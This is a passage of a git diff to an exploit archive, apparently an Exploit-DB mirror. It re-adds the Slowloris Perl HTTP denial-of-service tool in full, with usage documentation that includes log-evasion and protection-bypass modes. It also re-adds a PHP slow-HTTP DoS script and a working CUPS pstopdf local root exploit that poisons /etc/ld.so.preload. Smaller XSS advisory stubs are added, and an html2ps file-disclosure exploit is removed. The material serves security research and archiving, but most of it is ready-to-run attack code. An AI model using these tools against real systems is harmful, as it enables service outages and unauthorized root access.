that's enough time. Slowloris closed the socket.\n"; - print "Use $delay seconds for -timeout.\n"; - exit; - } - else { - print "Remote server closed socket.\n"; - print "Use $delay seconds for -timeout.\n"; - exit; - } - if ( $delay < 166 ) { - print < "$host", - PeerPort => "$port", - Timeout => "$tcpto", - Proto => "tcp", - ) - ) - { - $working[$z] = 1; - } - else { - $working[$z] = 0; - } - } - else { - if ( - $sock[$z] = new IO::Socket::INET( - PeerAddr => "$host", - PeerPort => "$port", - Timeout => "$tcpto", - Proto => "tcp", - ) - ) - { - $working[$z] = 1; - $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK - } - else { - $working[$z] = 0; - } - } - if ( $working[$z] == 1 ) { - if ($cache) { - $rand = "?" . int( rand(99999999999999) ); - } - else { - $rand = ""; - } - my $primarypayload = - "$method /$rand HTTP/1.1\r\n" - . "Host: $sendhost\r\n" - . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" - . "Content-Length: 42\r\n"; - my $handle = $sock[$z]; - if ($handle) { - print $handle "$primarypayload"; - if ( $SIG{__WARN__} ) { - $working[$z] = 0; - close $handle; - $failed++; - $failedconnections++; - } - else { - $packetcount++; - $working[$z] = 1; - } - } - else { - $working[$z] = 0; - $failed++; - $failedconnections++; - } - } - else { - $working[$z] = 0; - $failed++; - $failedconnections++; - } - } - } - print "\t\tSending data.\n"; - foreach my $z ( 1 .. $num ) { - if ( $working[$z] == 1 ) { - if ( $sock[$z] ) { - my $handle = $sock[$z]; - if ( print $handle "X-a: b\r\n" ) { - $working[$z] = 1; - $packetcount++; - } - else { - $working[$z] = 0; - #debugging info - $failed++; - $failedconnections++; - } - } - else { - $working[$z] = 0; - #debugging info - $failed++; - $failedconnections++; - } - } - } - print -"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; - sleep($timeout); - } -} - -sub domultithreading { - my ($num) = @_; - my @thrs; - my $i = 0; - my $connectionsperthread = 50; - while ( $i < $num ) { - $thrs[$i] = - threads->create( \&doconnections, $connectionsperthread, 1 ); - $i += $connectionsperthread; - } - my @threadslist = threads->list(); - while ( $#threadslist > 0 ) { - $failed = 0; - } -} - -__END__ - -=head1 TITLE - -Slowloris - -=head1 VERSION - -Version 0.7 Beta - -=head1 DATE - -06/17/2009 - -=head1 AUTHOR - -RSnake with threading from John Kinsella - -=head1 ABSTRACT - -Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons. - -=head1 AFFECTS - -Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, Squid, others...? - -=head1 NOT AFFECTED - -IIS6.0, IIS7.0, lighthttpd, others...? - -=head1 DESCRIPTION - -Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well. - -As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood. - -=head2 Testing - -If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing: - -=head3 Testing Example: - -./slowloris.pl -dns www.example.com -port 80 -test - -This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing). - -=head2 HTTP DoS - -Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though. - -=head3 HTTP DoS Example: - -./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 - -=head2 HTTPReady Bypass - -HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch. - -=head3 HTTPReady Bypass Example - -./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready - -=head2 Stealth Host DoS - -If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately. - -=head3 Stealth Host DoS Example: - -./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com - -=head2 HTTPS DoS - -Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary. - -=head3 HTTPS DoS Example: - -./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https - -=head2 HTTP Cache - -Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary. - -=head3 HTTP Cache Example: - -./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache - -=head1 Issues - -Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested. - -Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture. - -For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD. - -Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too. - -=head1 What is a slow loris? - -What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out: - -http://www.youtube.com/watch?v=rLdQ3UhLoD4 - -# milw0rm.com [2009-06-17] +#!/usr/bin/perl -w +use strict; +use IO::Socket::INET; +use IO::Socket::SSL; +use Getopt::Long; +use Config; + +$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors + +print < \$shost, + 'dns=s' => \$host, + 'httpready' => \$httpready, + 'num=i' => \$connections, + 'cache' => \$cache, + 'port=i' => \$port, + 'https' => \$ssl, + 'tcpto=i' => \$tcpto, + 'test' => \$test, + 'timeout=i' => \$timeout, + 'version' => \$version, +); + +if ($version) { + print "Version 0.7\n"; + exit; +} + +unless ($host) { + print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; + print "\n\tType 'perldoc $0' for help with options.\n\n"; + exit; +} + +unless ($port) { + $port = 80; + print "Defaulting to port 80.\n"; +} + +unless ($tcpto) { + $tcpto = 5; + print "Defaulting to a 5 second tcp connection timeout.\n"; +} + +unless ($test) { + unless ($timeout) { + $timeout = 100; + print "Defaulting to a 100 second re-try timeout.\n"; + } + unless ($connections) { + $connections = 1000; + print "Defaulting to 1000 connections.\n"; + } +} + +my $usemultithreading = 0; +if ( $Config{usethreads} ) { + print "Multithreading enabled.\n"; + $usemultithreading = 1; + use threads; + use threads::shared; +} +else { + print "No multithreading capabilites found!\n"; + print "Slowloris will be slower than normal as a result.\n"; +} + +my $packetcount : shared = 0; +my $failed : shared = 0; +my $connectioncount : shared = 0; + +srand() if ($cache); + +if ($shost) { + $sendhost = $shost; +} +else { + $sendhost = $host; +} +if ($httpready) { + $method = "POST"; +} +else { + $method = "GET"; +} + +if ($test) { + my @times = ( "2", "30", "90", "240", "500" ); + my $totaltime = 0; + foreach (@times) { + $totaltime = $totaltime + $_; + } + $totaltime = $totaltime / 60; + print "This test could take up to $totaltime minutes.\n"; + + my $delay = 0; + my $working = 0; + my $sock; + + if ($ssl) { + if ( + $sock = new IO::Socket::SSL( + PeerAddr => "$host", + PeerPort => "$port", + Timeout => "$tcpto", + Proto => "tcp", + ) + ) + { + $working = 1; + } + } + else { + if ( + $sock = new IO::Socket::INET( + PeerAddr => "$host", + PeerPort => "$port", + Timeout => "$tcpto", + Proto => "tcp", + ) + ) + { + $working = 1; + } + } + if ($working) { + if ($cache) { + $rand = "?" . int( rand(99999999999999) ); + } + else { + $rand = ""; + } + my $primarypayload = + "GET /$rand HTTP/1.1\r\n" + . "Host: $sendhost\r\n" + . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" + . "Content-Length: 42\r\n"; + if ( print $sock $primarypayload ) { + print "Connection successful, now comes the waiting game...\n"; + } + else { + print +"That's odd - I connected but couldn't send the data to $host:$port.\n"; + print "Is something wrong?\nDying.\n"; + exit; + } + } + else { + print "Uhm... I can't connect to $host:$port.\n"; + print "Is something wrong?\nDying.\n"; + exit; + } + for ( my $i = 0 ; $i <= $#times ; $i++ ) { + print "Trying a $times[$i] second delay: \n"; + sleep( $times[$i] ); + if ( print $sock "X-a: b\r\n" ) { + print "\tWorked.\n"; + $delay = $times[$i]; + } + else { + if ( $SIG{__WARN__} ) { + $delay = $times[ $i - 1 ]; + last; + } + print "\tFailed after $times[$i] seconds.\n"; + } + } + + if ( print $sock "Connection: Close\r\n\r\n" ) { + print "Okay that's enough time. Slowloris closed the socket.\n"; + print "Use $delay seconds for -timeout.\n"; + exit; + } + else { + print "Remote server closed socket.\n"; + print "Use $delay seconds for -timeout.\n"; + exit; + } + if ( $delay < 166 ) { + print < "$host", + PeerPort => "$port", + Timeout => "$tcpto", + Proto => "tcp", + ) + ) + { + $working[$z] = 1; + } + else { + $working[$z] = 0; + } + } + else { + if ( + $sock[$z] = new IO::Socket::INET( + PeerAddr => "$host", + PeerPort => "$port", + Timeout => "$tcpto", + Proto => "tcp", + ) + ) + { + $working[$z] = 1; + $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK + } + else { + $working[$z] = 0; + } + } + if ( $working[$z] == 1 ) { + if ($cache) { + $rand = "?" . int( rand(99999999999999) ); + } + else { + $rand = ""; + } + my $primarypayload = + "$method /$rand HTTP/1.1\r\n" + . "Host: $sendhost\r\n" + . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" + . "Content-Length: 42\r\n"; + my $handle = $sock[$z]; + if ($handle) { + print $handle "$primarypayload"; + if ( $SIG{__WARN__} ) { + $working[$z] = 0; + close $handle; + $failed++; + $failedconnections++; + } + else { + $packetcount++; + $working[$z] = 1; + } + } + else { + $working[$z] = 0; + $failed++; + $failedconnections++; + } + } + else { + $working[$z] = 0; + $failed++; + $failedconnections++; + } + } + } + print "\t\tSending data.\n"; + foreach my $z ( 1 .. $num ) { + if ( $working[$z] == 1 ) { + if ( $sock[$z] ) { + my $handle = $sock[$z]; + if ( print $handle "X-a: b\r\n" ) { + $working[$z] = 1; + $packetcount++; + } + else { + $working[$z] = 0; + #debugging info + $failed++; + $failedconnections++; + } + } + else { + $working[$z] = 0; + #debugging info + $failed++; + $failedconnections++; + } + } + } + print +"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; + sleep($timeout); + } +} + +sub domultithreading { + my ($num) = @_; + my @thrs; + my $i = 0; + my $connectionsperthread = 50; + while ( $i < $num ) { + $thrs[$i] = + threads->create( \&doconnections, $connectionsperthread, 1 ); + $i += $connectionsperthread; + } + my @threadslist = threads->list(); + while ( $#threadslist > 0 ) { + $failed = 0; + } +} + +__END__ + +=head1 TITLE + +Slowloris + +=head1 VERSION + +Version 0.7 Beta + +=head1 DATE + +06/17/2009 + +=head1 AUTHOR + +RSnake with threading from John Kinsella + +=head1 ABSTRACT + +Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons. + +=head1 AFFECTS + +Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, Squid, others...? + +=head1 NOT AFFECTED + +IIS6.0, IIS7.0, lighthttpd, others...? + +=head1 DESCRIPTION + +Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well. + +As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood. + +=head2 Testing + +If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing: + +=head3 Testing Example: + +./slowloris.pl -dns www.example.com -port 80 -test + +This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing). + +=head2 HTTP DoS + +Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though. + +=head3 HTTP DoS Example: + +./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 + +=head2 HTTPReady Bypass + +HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch. + +=head3 HTTPReady Bypass Example + +./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready + +=head2 Stealth Host DoS + +If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately. + +=head3 Stealth Host DoS Example: + +./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com + +=head2 HTTPS DoS + +Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary. + +=head3 HTTPS DoS Example: + +./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https + +=head2 HTTP Cache + +Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary. + +=head3 HTTP Cache Example: + +./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache + +=head1 Issues + +Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested. + +Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture. + +For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD. + +Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too. + +=head1 What is a slow loris? + +What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out: + +http://www.youtube.com/watch?v=rLdQ3UhLoD4 + +# milw0rm.com [2009-06-17] diff --git a/platforms/multiple/dos/8991.php b/platforms/multiple/dos/8991.php index 1f3a6a50c..f3373e261 100755 --- a/platforms/multiple/dos/8991.php +++ b/platforms/multiple/dos/8991.php @@ -1,94 +1,94 @@ - \n"; - die(); -} - -/** - * Hangs the connection to the webserver - * - * @param $server string - * @return void - */ -function killTheFucker($server) -{ - $request = "GET / HTTP/1.1\r\n"; - $request .= "Host: {$server}\r\n"; - $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n"; - $request .= "Content-Length: " . rand(1, 1000) . "\r\n"; - $request .= "X-a: " . rand(1, 10000) . "\r\n"; - - $sockfd = @fsockopen($server, 80, $errno, $errstr); - @fwrite($sockfd, $request); - - while((fwrite($sockfd, "X-c:" . rand(1, 10000) . "\r\n")) !== FALSE) - { - sleep(15); - } - - -} - -/** - * main function - * @param $argc int - * @param $argv array - * @return void - */ -function main($argc, $argv) -{ - $status = 1; - - if ($argc < 3) - { - usage($argv); - } - - $pids = Array(); - - for ($i = 0; $i < $argv[1]; $i++) - { - $pid = pcntl_fork(); - - if ($pid == -1) - { - die("ERROR!@# YOU MADE BABY JESUS CRY"); - } - else if ($pid == 0) - { - killTheFucker($argv[2]); - exit(0); - } - else - { - $pids[] = $pid; - } - } - - foreach ($pids as $pid) - { - pcntl_waitpid($pid, $status); - } -} - -// fire everything up -main($argc, $argv); - -# milw0rm.com [2009-06-22] + \n"; + die(); +} + +/** + * Hangs the connection to the webserver + * + * @param $server string + * @return void + */ +function killTheFucker($server) +{ + $request = "GET / HTTP/1.1\r\n"; + $request .= "Host: {$server}\r\n"; + $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n"; + $request .= "Content-Length: " . rand(1, 1000) . "\r\n"; + $request .= "X-a: " . rand(1, 10000) . "\r\n"; + + $sockfd = @fsockopen($server, 80, $errno, $errstr); + @fwrite($sockfd, $request); + + while((fwrite($sockfd, "X-c:" . rand(1, 10000) . "\r\n")) !== FALSE) + { + sleep(15); + } + + +} + +/** + * main function + * @param $argc int + * @param $argv array + * @return void + */ +function main($argc, $argv) +{ + $status = 1; + + if ($argc < 3) + { + usage($argv); + } + + $pids = Array(); + + for ($i = 0; $i < $argv[1]; $i++) + { + $pid = pcntl_fork(); + + if ($pid == -1) + { + die("ERROR!@# YOU MADE BABY JESUS CRY"); + } + else if ($pid == 0) + { + killTheFucker($argv[2]); + exit(0); + } + else + { + $pids[] = $pid; + } + } + + foreach ($pids as $pid) + { + pcntl_waitpid($pid, $status); + } +} + +// fire everything up +main($argc, $argv); + +# milw0rm.com [2009-06-22] diff --git a/platforms/multiple/local/7550.c b/platforms/multiple/local/7550.c index 58fbc7f19..8d2406bbd 100755 --- a/platforms/multiple/local/7550.c +++ b/platforms/multiple/local/7550.c @@ -1,102 +1,102 @@ -/* - * cve-2008-5377.c - * - * CUPS < 1.3.8-4 pstopdf filter exploit - * Jon Oberheide - * http://jon.oberheide.org - * - * Usage: - * - * $ gcc cve-2008-5377.c -o cve-2008-5377.c - * $ ./cve-2008-5377 - * $ id - * uid=0(root) gid=1000(vm) ... - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377 - * - * pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via - * a symlink attack on the /tmp/pstopdf.log temporary file. - * - * Operation: - * - * The exploit creates and prints a malformed postscript document that will - * cause the CUPS pstopdf filter to write an error message out to its log - * file that contains the string /tmp/getuid.so. However, since we also - * symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the - * error message and malicious shared library path will be appended to the - * ld.so.preload file, allowing us to elevate privileges to root. - * - * Note: - * - * This exploit only works under the (rare) conditions that cupsd executes - * external filters as a privileged user, a printer on the system uses the - * pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload - * must be world readable. - */ - -#include -#include -#include -#include -#include -#include -#include - -int -main(void) -{ - int ret; - FILE *fp; - struct stat log; - - fp = fopen("/tmp/cve-2008-5377.ps", "w"); - if(!fp) { - printf("error: cannot open /tmp/cve-2008-5377.ps\n"); - goto cleanup; - } - fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n"); - fclose(fp); - - fp = fopen("/tmp/getuid.c", "w"); - if(!fp) { - printf("error: cannot open /tmp/getuid.c\n"); - goto cleanup; - } - fprintf(fp, "int getuid(){return 0;}\n"); - fclose(fp); - - ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so"); - if (WEXITSTATUS(ret) != 0) { - printf("error: cannot compile /tmp/getuid.c\n"); - goto cleanup; - } - - unlink("/tmp/pstopdf.log"); - ret = stat("/tmp/pstopdf.log", &log); - if (ret != -1) { - - printf("error: /tmp/pstopdf.log already exists\n"); - goto cleanup; - } - - ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log"); - if (ret == -1) { - printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n"); - goto cleanup; - } - - ret = system("lp < /tmp/cve-2008-5377.ps"); - if (WEXITSTATUS(ret) != 0) { - printf("error: could not print /tmp/cve-2008-5377.ps\n"); - goto cleanup; - } - -cleanup: - unlink("/tmp/cve-2008-5377.ps"); - unlink("/tmp/getuid.c"); - return 0; -} - -// milw0rm.com [2008-12-22] +/* + * cve-2008-5377.c + * + * CUPS < 1.3.8-4 pstopdf filter exploit + * Jon Oberheide + * http://jon.oberheide.org + * + * Usage: + * + * $ gcc cve-2008-5377.c -o cve-2008-5377.c + * $ ./cve-2008-5377 + * $ id + * uid=0(root) gid=1000(vm) ... + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377 + * + * pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via + * a symlink attack on the /tmp/pstopdf.log temporary file. + * + * Operation: + * + * The exploit creates and prints a malformed postscript document that will + * cause the CUPS pstopdf filter to write an error message out to its log + * file that contains the string /tmp/getuid.so. However, since we also + * symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the + * error message and malicious shared library path will be appended to the + * ld.so.preload file, allowing us to elevate privileges to root. + * + * Note: + * + * This exploit only works under the (rare) conditions that cupsd executes + * external filters as a privileged user, a printer on the system uses the + * pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload + * must be world readable. + */ + +#include +#include +#include +#include +#include +#include +#include + +int +main(void) +{ + int ret; + FILE *fp; + struct stat log; + + fp = fopen("/tmp/cve-2008-5377.ps", "w"); + if(!fp) { + printf("error: cannot open /tmp/cve-2008-5377.ps\n"); + goto cleanup; + } + fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n"); + fclose(fp); + + fp = fopen("/tmp/getuid.c", "w"); + if(!fp) { + printf("error: cannot open /tmp/getuid.c\n"); + goto cleanup; + } + fprintf(fp, "int getuid(){return 0;}\n"); + fclose(fp); + + ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so"); + if (WEXITSTATUS(ret) != 0) { + printf("error: cannot compile /tmp/getuid.c\n"); + goto cleanup; + } + + unlink("/tmp/pstopdf.log"); + ret = stat("/tmp/pstopdf.log", &log); + if (ret != -1) { + + printf("error: /tmp/pstopdf.log already exists\n"); + goto cleanup; + } + + ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log"); + if (ret == -1) { + printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n"); + goto cleanup; + } + + ret = system("lp < /tmp/cve-2008-5377.ps"); + if (WEXITSTATUS(ret) != 0) { + printf("error: could not print /tmp/cve-2008-5377.ps\n"); + goto cleanup; + } + +cleanup: + unlink("/tmp/cve-2008-5377.ps"); + unlink("/tmp/getuid.c"); + return 0; +} + +// milw0rm.com [2008-12-22] diff --git a/platforms/multiple/remote/33405.txt b/platforms/multiple/remote/33405.txt new file mode 100755 index 000000000..734361f76 --- /dev/null +++ b/platforms/multiple/remote/33405.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/37338/info + + +The APC Network Management Card is prone to multiple cross-site request-forgery and cross-site scripting vulnerabilities. + +An attacker can exploit the cross-site request forgery issues to alter the settings on affected devices, which may lead to further network-based attacks. + +The attacker can exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible. + +Versions prior to the following are vulnerable: + +Network Management Card Firmware 3.7.2 +Network Management Card Firmware 5.1.1 + +http://www.example.com/Forms/login1?login_username= \ No newline at end of file diff --git a/platforms/multiple/webapps/14006.txt b/platforms/multiple/webapps/14006.txt deleted file mode 100755 index 499eafdd2..000000000 --- a/platforms/multiple/webapps/14006.txt +++ /dev/null @@ -1,17 +0,0 @@ -Advisory Name: Local Privilege Escalation in InterScan Web Security Virtual -Apliance 5.0 -Internal Cybsec Advisory Id: 2010-0604 -Vulnerability Class: Local Privilege Escalation -Release Date: 22-06-2010 -Affected Applications: InterScan Web Security Virtual Aplliance 5.0. Other versions may be affected -Affected Platforms: Red Hat nash 5.1 -Local / Remote: Local -Severity: Medium - CVSS: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C) -Researcher: Ivan Huertas -Vendor Status: Patched -Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf - -Vulnerability Description: -InterScan Web Security Virtual Appliance has a shell called “uihelper” that has suid bit on. So it could be possible to execute commands as root. Also using the vulnerability “Arbitrary File Upload” remote commands could be run as root. - -http://www.exploit-db.com/sploits/cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf \ No newline at end of file diff --git a/platforms/multiple/webapps/9827.py b/platforms/multiple/webapps/9827.py deleted file mode 100755 index 7c5463860..000000000 --- a/platforms/multiple/webapps/9827.py +++ /dev/null @@ -1,46 +0,0 @@ -#!/usr/bin/env python -# -# html2ps <= 1.0 beta5 arbitrary file disclosure -# http://user.it.uu.se/~jan/html2ps.html -# author: epiphant -# -# the "include file" ssi directive doesn't check for directory -# traversal so you can include and disclose any file in the -# dir tree (very handy when html2ps is running as a part of a -# web app with data that you control) -# the vuln requires that "ssi" in the @html2ps block in the -# html2psrc file is set to 1, which is the default -# -# bonus info: some of the backtick operators look shady too -# but will require lots of prerequisites so they're uncool -# -# shouts: thcx labs, zybadawg333, fabiodds, str0ke -# jan k: shame on you - your perl is very ugly -# - -import os - -d = """\ - - -epiphant - - -

epiphant

- -

epiphant

- - -""" - -try: - fi = open("epiphant.html", "w") - fi.write(d) - fi.close() -except: - print "can't write here" - exit(1) - -os.system("html2ps epiphant.html > epiphant.ps") -os.system("gv epiphant.ps") -exit(0) diff --git a/platforms/php/remote/33414.php b/platforms/php/remote/33414.php new file mode 100755 index 000000000..d576cb00f --- /dev/null +++ b/platforms/php/remote/33414.php @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/37389/info + +PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks. + +Versions prior to PHP 5.2.12 are vulnerable. + +// overlong UTF-8 sequence +echo htmlspecialchars("A\xC0\xAF&", ENT_QUOTES, 'UTF-8'); +// invalid Shift_JIS sequence +echo htmlspecialchars("B\x80&", ENT_QUOTES, 'Shift_JIS'); +echo htmlspecialchars("C\x81\x7f&", ENT_QUOTES, 'Shift_JIS'); +// invalid EUC-JP sequence +echo htmlspecialchars("D\x80&", ENT_QUOTES, 'EUC-JP'); +echo htmlspecialchars("E\xA1\xFF&", ENT_QUOTES, 'EUC-JP'); +echo htmlspecialchars("F\x8E\xFF&", 